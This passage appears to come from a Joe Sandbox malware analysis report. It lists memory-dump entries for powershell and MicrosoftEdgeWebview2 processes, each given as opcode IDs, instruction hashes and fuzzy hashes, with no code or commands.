              • Instruction Fuzzy Hash: CEE04F35804A4C8FDF54EF18C8594E97BE0FF68301B05029BE81DC7120DB71AA58CBC2
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1758865250.00007FFD9B6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_7ffd9b6e0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: K_^4$K_^7$K_^F$K_^J
              • API String ID: 0-377281160
              • Opcode ID: 4bcb7626cc64b94c55d6df8f3314fc61f7497ef9aa3022dd500b8fbce610da28
              • Instruction ID: 5864d6876c9b656f1fec18a6d9a796d8377cae410ee11958dee8b4d29452c290
              • Opcode Fuzzy Hash: 4bcb7626cc64b94c55d6df8f3314fc61f7497ef9aa3022dd500b8fbce610da28
              • Instruction Fuzzy Hash: B221F6B77085265ED7057B7DB8549DA3BA0DF9827438542F3D1A9CF093EE1470868AD0
              Memory Dump Source
              • Source File: 00000004.00000002.1858858877.00007FFD9B7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b7a0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 551646da129ecf417dcdf504edf4304fa72307ce34b98e6873b41d4c255c773d
              • Instruction ID: efab48053a2a3b27eff950bc3d9e636c7d823ad37128dec4c83745cfa6f4e239
              • Opcode Fuzzy Hash: 551646da129ecf417dcdf504edf4304fa72307ce34b98e6873b41d4c255c773d
              • Instruction Fuzzy Hash: 6FC14872B1FB8E4FEBA5ABA848655B9BBD1EF55310B0502BED45DC70F3DA18E9008341
              Memory Dump Source
              • Source File: 00000004.00000002.1858119594.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b6d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 81cf1c36e49e3d54de58b94aece50726699f246ec0ccb341ae10c0d1d0751696
              • Instruction ID: 778c20e8df5794df75784c7039aa55601ac9a67e09162ae01404d1445ba68f9a
              • Opcode Fuzzy Hash: 81cf1c36e49e3d54de58b94aece50726699f246ec0ccb341ae10c0d1d0751696
              • Instruction Fuzzy Hash: 95412971A0DB888FDB18DF5C9C1A6A87FE0FB95310F04426FD499C7192DA20B815CBC2
              Memory Dump Source
              • Source File: 00000004.00000002.1857443692.00007FFD9B5BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5BD000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b5bd000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8724d8deecaa35d3e68d255ec1acda26dc875d56f8f1957a9ad6cebc53dbb2f5
              • Instruction ID: b895d10c67169fab0472804ea25a6f6ea510afb6c062f02e032dcbead91d1528
              • Opcode Fuzzy Hash: 8724d8deecaa35d3e68d255ec1acda26dc875d56f8f1957a9ad6cebc53dbb2f5
              • Instruction Fuzzy Hash: 76413E7140EBC44FE7978B3898519623FF0FF56324B1905DFD089CB1A3D625A846CB92
              Memory Dump Source
              • Source File: 00000004.00000002.1858119594.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b6d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e7d98cce31b6ee0988941645864e4a86c8a845b7d928a89e262fc81b035a1df0
              • Instruction ID: ddbaeea1e075a52b47425bf0dd2d90eae4f1f66b774e8e157ce8c4ebd27347c1
              • Opcode Fuzzy Hash: e7d98cce31b6ee0988941645864e4a86c8a845b7d928a89e262fc81b035a1df0
              • Instruction Fuzzy Hash: 3221283190CB4C4FDB59DBAC9C4A7E97BF0EB96320F04826BD049C7152DA74A816CB91
              Memory Dump Source
              • Source File: 00000004.00000002.1858119594.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b6d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
              • Instruction ID: 0c6d2c360707e00c7e88e4e6656347cd16ed5dd2fb8571ff3f9b6faa4a7628a3
              • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
              • Instruction Fuzzy Hash: A301A73020CB0C4FD748EF0CE451AA6B3E0FB85364F10056EE58AC36A1DA32E882CB41
              Memory Dump Source
              • Source File: 00000004.00000002.1858119594.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b6d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 431c5a6b7b22a692d4f14543591fdb70d9b12c8d8bb0e076c5b7245d90daf50d
              • Instruction ID: c263755d94cb2424dfe9528d670569d7a6f0261367bc15ac03c105d370531107
              • Opcode Fuzzy Hash: 431c5a6b7b22a692d4f14543591fdb70d9b12c8d8bb0e076c5b7245d90daf50d
              • Instruction Fuzzy Hash: FDF02B3661EA8C4FDB91DF2C9C690E47FA0FFB6201B0502BBD558CB161DB219908C7C2
              Memory Dump Source
              • Source File: 00000004.00000002.1858858877.00007FFD9B7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b7a0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e08e0800ae08f47550bd357fdc78e4d2a47e1ec82bde4bb419d39a0c662a3f87
              • Instruction ID: 249a53cfeea5a5710772d72aac8da8857288eb759fae4957ca314217e47ff183
              • Opcode Fuzzy Hash: e08e0800ae08f47550bd357fdc78e4d2a47e1ec82bde4bb419d39a0c662a3f87
              • Instruction Fuzzy Hash: 10F0BE32B0E6498FD7A9EA8CE4518A877E0EF55320B1600BAE06DC71B3CA26EC40C745
              Memory Dump Source
              • Source File: 00000004.00000002.1858858877.00007FFD9B7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b7a0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: eb6ff3db79ea7d1ffc20fe143ae744ee26f26c9da3615d1d2cbd515a01255768
              • Instruction ID: 3db109a99dd4d81cb40f9ae75e0641eaabcefdb6057fe40abc5ea5bf6746e43f
              • Opcode Fuzzy Hash: eb6ff3db79ea7d1ffc20fe143ae744ee26f26c9da3615d1d2cbd515a01255768
              • Instruction Fuzzy Hash: 5AF05E32A0E6498FD7A9EA5CE4658A8B7E4FF4532075600BAE15DC74B3DA26AC40C750
              Memory Dump Source
              • Source File: 00000004.00000002.1858858877.00007FFD9B7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b7a0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
              • Instruction ID: d20cdf9936b2dfc4e0020c17d8187e0ca91556ee5f6b31774fb9f5d0e77ecf9e
              • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
              • Instruction Fuzzy Hash: 33E04F31B0C9089FDAB8DA4CE0519E977E1EFA8331B1202BBD14EC7571CA22ED51CB81
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.1858119594.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b6d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: L_^8$L_^<$L_^?$L_^J$L_^K$L_^N$L_^Q$L_^Y
              • API String ID: 0-1415242001
              • Opcode ID: 43fc97dd348e09cb18fe9713d6d3d241ea91d68ddf1fc4c99a3e80af88e2cd8f
              • Instruction ID: 60e513dcc1508e9cb8116ea7ef1f28b002582ff0594fe0830d677862ff448b96
              • Opcode Fuzzy Hash: 43fc97dd348e09cb18fe9713d6d3d241ea91d68ddf1fc4c99a3e80af88e2cd8f
              • Instruction Fuzzy Hash: C821D473B045154AC30637ADB8529EE7B80DF9437838562F3E629CF597DF24A48B8A80
              Memory Dump Source
              • Source File: 00000007.00000002.1998213795.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffd9b780000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bfc5e41a9e8d5548116318501d9949eb2332d601c0566e1267fa17deead8583b
              • Instruction ID: 569ca066049e395f35a2399278a5a770a55f879ead383ced662b662a0a293836
              • Opcode Fuzzy Hash: bfc5e41a9e8d5548116318501d9949eb2332d601c0566e1267fa17deead8583b
              • Instruction Fuzzy Hash: 4CC15872B0EF8E1FEBA5EAA858A55797BD1EF15311B0902BED45DC70F3DA24E8008341
              Memory Dump Source
              • Source File: 00000007.00000002.1997262427.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffd9b6b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8eb2ad80486685a606b294f4eabc5069d4601ef5f3d51a352c326ffdea0e8d06
              • Instruction ID: 797495999add34aa7756eae6e13348f405708522503b8984824c2938cf3879f2
              • Opcode Fuzzy Hash: 8eb2ad80486685a606b294f4eabc5069d4601ef5f3d51a352c326ffdea0e8d06
              • Instruction Fuzzy Hash: 75A14A3160EB894FD71ADB6CC8A55A47BF0EF56314B0901BFC099CB1A3DE256847CB52
              Memory Dump Source
              • Source File: 00000007.00000002.1997262427.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffd9b6b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fbe68b8246412924653614d3019c74c08fb60248365b2ab36ba8607b6a7b04db
              • Instruction ID: d6640528586d6e23e4fa3d19fcc278546282f522e21cf34ffae55ae4ef3fa9be
              • Opcode Fuzzy Hash: fbe68b8246412924653614d3019c74c08fb60248365b2ab36ba8607b6a7b04db
              • Instruction Fuzzy Hash: 21415A7191DB8C8FDB189F5C980A6B9BBE0FB95310F04816FE45883292DB74B945CBC2
              Memory Dump Source
              • Source File: 00000007.00000002.1996480783.00007FFD9B59D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B59D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffd9b59d000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7ce3c46d71356aa5a3939bc4ab824d81c3ed6dab2f986cfd28f29aa75d880091
              • Instruction ID: cacf19409f0b950a1c3e7d4013abeb75532df1463295f56eca668fbd1146ecd2
              • Opcode Fuzzy Hash: 7ce3c46d71356aa5a3939bc4ab824d81c3ed6dab2f986cfd28f29aa75d880091
              • Instruction Fuzzy Hash: 2241177150EBC48FD7578B3898959523FF0EF57220B1A06DFD088CB1A3D625A84AC792
              Memory Dump Source
              • Source File: 00000007.00000002.1997262427.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffd9b6b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8db09c195e6da6adcd40a886bf5095956b4b02f100f993babd7de62974935fcb
              • Instruction ID: fcd2180e0aac97f0240a23aefaaa58913d2fb940b921474ae8ac63b26d959ac4
              • Opcode Fuzzy Hash: 8db09c195e6da6adcd40a886bf5095956b4b02f100f993babd7de62974935fcb
              • Instruction Fuzzy Hash: BD313B7690EAD94FDB269B7C88654E57FB0EF11704B0A01FBD0E88F0A3EE1465598781
              Memory Dump Source
              • Source File: 00000007.00000002.1998213795.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffd9b780000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: aa072a55fa4fc61690c01b24efe699ec25ba4940d13dd4a025b7aa64b6008d38
              • Instruction ID: db296f8f4ead9adafffa547e8a8b93520f85dcb8ad3473f43217fa4ad284c59c
              • Opcode Fuzzy Hash: aa072a55fa4fc61690c01b24efe699ec25ba4940d13dd4a025b7aa64b6008d38
              • Instruction Fuzzy Hash: 8511E271B0EB8E9FEBA4DA98A0E46787781DF48312F1542BEC04DE71E7C925A8058351
              Memory Dump Source
              • Source File: 00000007.00000002.1997262427.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffd9b6b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 672cddce3b61fd07d14acf0d5ff0c6c5c9905a2842d53f114a6d1ab46604d338
              • Instruction ID: 21445a0841d7e35a1e69ec8328e2c92e44b6098ee529c1b6e8647e908ff35827
              • Opcode Fuzzy Hash: 672cddce3b61fd07d14acf0d5ff0c6c5c9905a2842d53f114a6d1ab46604d338
              • Instruction Fuzzy Hash: 8701A73120CB0C4FD748EF0CE051AA6B3E0FB85364F50056EE58AC36A1DA32E882CB41
              Memory Dump Source
              • Source File: 00000007.00000002.1998213795.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffd9b780000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e2e3b372c87a265d1de846e8904a210eacdfe6ebba2c2771f95adc5666777b65
              • Instruction ID: 386fc338cf5dd25e658c709f1df643f7fa27211331a462611e4b2d3d4a21a843
              • Opcode Fuzzy Hash: e2e3b372c87a265d1de846e8904a210eacdfe6ebba2c2771f95adc5666777b65
              • Instruction Fuzzy Hash: A5F0B432B0DA098FD769EA4CE4918A873E0EF55321B1200BAE05DC71B7CA35EC40C745
              Memory Dump Source
              • Source File: 00000007.00000002.1998213795.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffd9b780000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 07ea2650f15046fe3328d01e824162d753f1a85d63245fc9311fc687fb612a9b
              • Instruction ID: e4e321b789c69c2086875d9fcb3bb0f945959a61bbb33625e4fe80491fbc3e32
              • Opcode Fuzzy Hash: 07ea2650f15046fe3328d01e824162d753f1a85d63245fc9311fc687fb612a9b
              • Instruction Fuzzy Hash: BBF0BE32A0EA498FD764EA4CE0A48A8B3E0FF05321B0200BAE05DC70B3CA35AC40C740
              Memory Dump Source
              • Source File: 00000007.00000002.1998213795.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffd9b780000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
              • Instruction ID: ffff31fa2cf165b37673aa0698ebfb6d308539014c5d3b066ef123b33c81593e
              • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
              • Instruction Fuzzy Hash: 4CE01231B0C9089FD679DA4CE0919A973E1EB98322B1102BBD14EC7571C631ED518B80
              Strings
              Memory Dump Source
              • Source File: 00000007.00000002.1997262427.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffd9b6b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: N_^$N_^$N_^$N_^$N_^
              • API String ID: 0-2528851458
              • Opcode ID: 348b6759718a9745e4e4c327f988ca68952b95a07e6d2c3e6fb49cad8ae0962d
              • Instruction ID: 1063a3eada181f5a5b27ced664c966e136155ec361d6195e0c2cfd909a3039d8
              • Opcode Fuzzy Hash: 348b6759718a9745e4e4c327f988ca68952b95a07e6d2c3e6fb49cad8ae0962d
              • Instruction Fuzzy Hash: 4351AC62B0F6E65FE72646698C7A4857FB0FF1225470A42FBC1A4CF0A3ED1879478742
              Strings
              Memory Dump Source
              • Source File: 00000007.00000002.1997262427.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffd9b6b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: N_^6$N_^<$N_^F$N_^I$N_^J
              • API String ID: 0-4116931533
              • Opcode ID: b5ad6c974f4b65a3938aa6a011e35daee5e7f7d819d9c44f84fd1af324a4e300
              • Instruction ID: 864b328537572512b6b8bafdbcb1cf3ff8d569b53acd9fa6510c796b15503245
              • Opcode Fuzzy Hash: b5ad6c974f4b65a3938aa6a011e35daee5e7f7d819d9c44f84fd1af324a4e300
              • Instruction Fuzzy Hash: 0F21FEA77084265FD30677EDBC209D96B80DFA42B678802B3D368CF643DE24608B87C1
              Memory Dump Source
              • Source File: 0000000F.00000002.2271438090.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffd9b6d0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5bbbc4cb28de361a2f1512ff35e6b727b0b1777402ad2ad1fa34e92dd7a21b73
              • Instruction ID: 5d5202429e8b4493a6db79938acd4f645fe3fbe6554dae81f7555b3f65591b3b
              • Opcode Fuzzy Hash: 5bbbc4cb28de361a2f1512ff35e6b727b0b1777402ad2ad1fa34e92dd7a21b73
              • Instruction Fuzzy Hash: 1C421821B19A094FE7A8EB7C88756B977D2FFD8740F4406B9E41EC72D6DE28B8018741
              Memory Dump Source
              • Source File: 0000000F.00000002.2271438090.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffd9b6d0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b6915542e66c195e14ad402df0ec522f6759a8e786b03c3616b8bf912cc2753f
              • Instruction ID: a16412cecd7307c7ebd8f19594a881dd16c11ad86e9a4c3386629b23db83b5bc
              • Opcode Fuzzy Hash: b6915542e66c195e14ad402df0ec522f6759a8e786b03c3616b8bf912cc2753f
              • Instruction Fuzzy Hash: 4551FF21B0E6C90FD79AABB848756757FE1DF97219B0801FAE09DCB1E7DD486806C342
              Memory Dump Source
              • Source File: 0000000F.00000002.2271438090.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffd9b6d0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9d07f08b0344ad690df8194355874d0fdca399e82dcc8b40b3587d7bcf0f95bc
              • Instruction ID: a374a65b3fc495e71be811f7b56bd2d062a6b477502f0441192c63068c130d79
              • Opcode Fuzzy Hash: 9d07f08b0344ad690df8194355874d0fdca399e82dcc8b40b3587d7bcf0f95bc
              • Instruction Fuzzy Hash: C8914522F0EA8E0FEB95A7788C715F97BE1EFC6210B4901B7D459CB1E7DD2868028341
              Memory Dump Source
              • Source File: 0000000F.00000002.2271438090.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffd9b6d0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 032a4463790b56472732dea3fb6273d1bfbaaf01cbad8cb2f4860f4a6bf2d8e9
              • Instruction ID: cae1940819757af82464f839f81d9039db8e2a624eceafc8039a30e923f8bb06
              • Opcode Fuzzy Hash: 032a4463790b56472732dea3fb6273d1bfbaaf01cbad8cb2f4860f4a6bf2d8e9
              • Instruction Fuzzy Hash: A431E421B199490FE79CEB6C886A679B7C2EFD8345F0401BEE05EC32EBDD64AC418341
              Memory Dump Source
              • Source File: 0000000F.00000002.2271438090.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffd9b6d0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f897eec74cb59a92259f822732eedf31ba0f8bcdfc1168c1a87c7cdf032ead1a
              • Instruction ID: 2c1625b37f09108bf062fdb0ce7af339d3deb9ddab92c22a53254af021860c78
              • Opcode Fuzzy Hash: f897eec74cb59a92259f822732eedf31ba0f8bcdfc1168c1a87c7cdf032ead1a
              • Instruction Fuzzy Hash: 0431E321B1990A4FE798BBBC5C397B977D2EFD8601F4403BAE41CC72D6DE2868018381
              Memory Dump Source
              • Source File: 0000000F.00000002.2271438090.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffd9b6d0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8cbdf3190f7b67216c8180065e085744ad0c751d27380db6d0670eb6d9f95ec5
              • Instruction ID: 160e58c90fc7b69c1d93b14ceaaa22726e0c5baf5b70a9ee3cf01a855760a7bd
              • Opcode Fuzzy Hash: 8cbdf3190f7b67216c8180065e085744ad0c751d27380db6d0670eb6d9f95ec5
              • Instruction Fuzzy Hash: 4C319131F18A1E4FEB44EBA888756EDB7A1FF98340F8006B5D519DB2C6DE38B8018740
              Memory Dump Source
              • Source File: 0000000F.00000002.2271438090.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffd9b6d0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 132a7a620f0943814054864f7d21e57ae4a63d68ad30096c69b64d4ddd862faf
              • Instruction ID: 3e7dfca2cececdd46c65e0a50dc45c753d650d87c86b831dd7b7db255a7cfbfe
              • Opcode Fuzzy Hash: 132a7a620f0943814054864f7d21e57ae4a63d68ad30096c69b64d4ddd862faf
              • Instruction Fuzzy Hash: A321CE35BA89095FD785EB7890A18A9BF71FF89380BC046E9ED19C73CAED3469008750
              Memory Dump Source
              • Source File: 0000000F.00000002.2271438090.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffd9b6d0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d5f07ac136eecd7c24496853c90c61efdce224b478d7d10b1d0c40c082871bcd
              • Instruction ID: d17a880d50f2de02198d2ec9503cc55a13b1d9fe08233a3cb9e5859ce9262038
              • Opcode Fuzzy Hash: d5f07ac136eecd7c24496853c90c61efdce224b478d7d10b1d0c40c082871bcd
              • Instruction Fuzzy Hash: AC014711A0DAC80FE791673C6C754757FE1CFD2760B0906AAE8ACCB0E3D8447A818381
              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.2271438090.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffd9b6d0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID: M_^ $M_^"$M_^$$M_^&
              • API String ID: 0-3382453705
              • Opcode ID: 6dc589e6ee095e8dae018908f6738f57f50834629b14eb364ae1cab5490db7ef
              • Instruction ID: 0c63d22eb577c50e4f736a3c35f9493b341e9ea6912ecb29945edefe481a3df2
              • Opcode Fuzzy Hash: 6dc589e6ee095e8dae018908f6738f57f50834629b14eb364ae1cab5490db7ef
              • Instruction Fuzzy Hash: 8221F4A7A0A0958AE2122BA86CB64EC3F90DF4161C78943F6C4F9CE0E3FD18714AC644
              Memory Dump Source
              • Source File: 00000010.00000002.2337109104.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_16_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1e7e015d9d9eb790c5ef810652f1af24f9d38206db483912fad84e42ecf3b56c
              • Instruction ID: fcb705609c9d8ba1e7ad2e9d037477279184fcce2d831a64076a34ef11f9e593
              • Opcode Fuzzy Hash: 1e7e015d9d9eb790c5ef810652f1af24f9d38206db483912fad84e42ecf3b56c
              • Instruction Fuzzy Hash: 51420621B2DA194FE7A8EB7C84796B977E2FF98300F410579E41EC72D6DE28B9018741
              Memory Dump Source
              • Source File: 00000010.00000002.2337109104.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_16_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 22d2df978a6e72c41f5d65976f17088e0f536872bdd3dad0ba5bae621857eff5
              • Instruction ID: b86681a8b1a6c11156898e222116313f833f70df00ec4109388adc7ebdf81520
              • Opcode Fuzzy Hash: 22d2df978a6e72c41f5d65976f17088e0f536872bdd3dad0ba5bae621857eff5
              • Instruction Fuzzy Hash: E351F111B1E6C90FD79AABB848756757FE1DF97219B0800FAE09DCB1E7DD086806C342
              Memory Dump Source
              • Source File: 00000010.00000002.2337109104.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_16_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: edb76b5748eba5a67aeb5d151b0e692cec2dc5f8f6edd9bc49ba1adaa39b43b4
              • Instruction ID: caeec50be2a42725b1ea8cac0078bff529e423b62d2c982cfab3e63be7a15062
              • Opcode Fuzzy Hash: edb76b5748eba5a67aeb5d151b0e692cec2dc5f8f6edd9bc49ba1adaa39b43b4
              • Instruction Fuzzy Hash: BB918822F0EA9A0FE795A76C98611F87FF1EF86210B4900B7D059CB1E7DE287C468751
              Memory Dump Source
              • Source File: 00000010.00000002.2337109104.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_16_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 12131d68a7a74dca6b553f0eb9309d80b517ef96bd71194baabaefa5a8db0c3f
              • Instruction ID: 58eafed386ffddffb6c607881fdb2eddda84edf858e53fc4c3d0f1e7438bc72f
              • Opcode Fuzzy Hash: 12131d68a7a74dca6b553f0eb9309d80b517ef96bd71194baabaefa5a8db0c3f
              • Instruction Fuzzy Hash: EB310221B1D9490FE79CEB6C846A679B7D2EF98345F0401BEE05EC32EBDD68AC418341
              Memory Dump Source
              • Source File: 00000010.00000002.2337109104.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
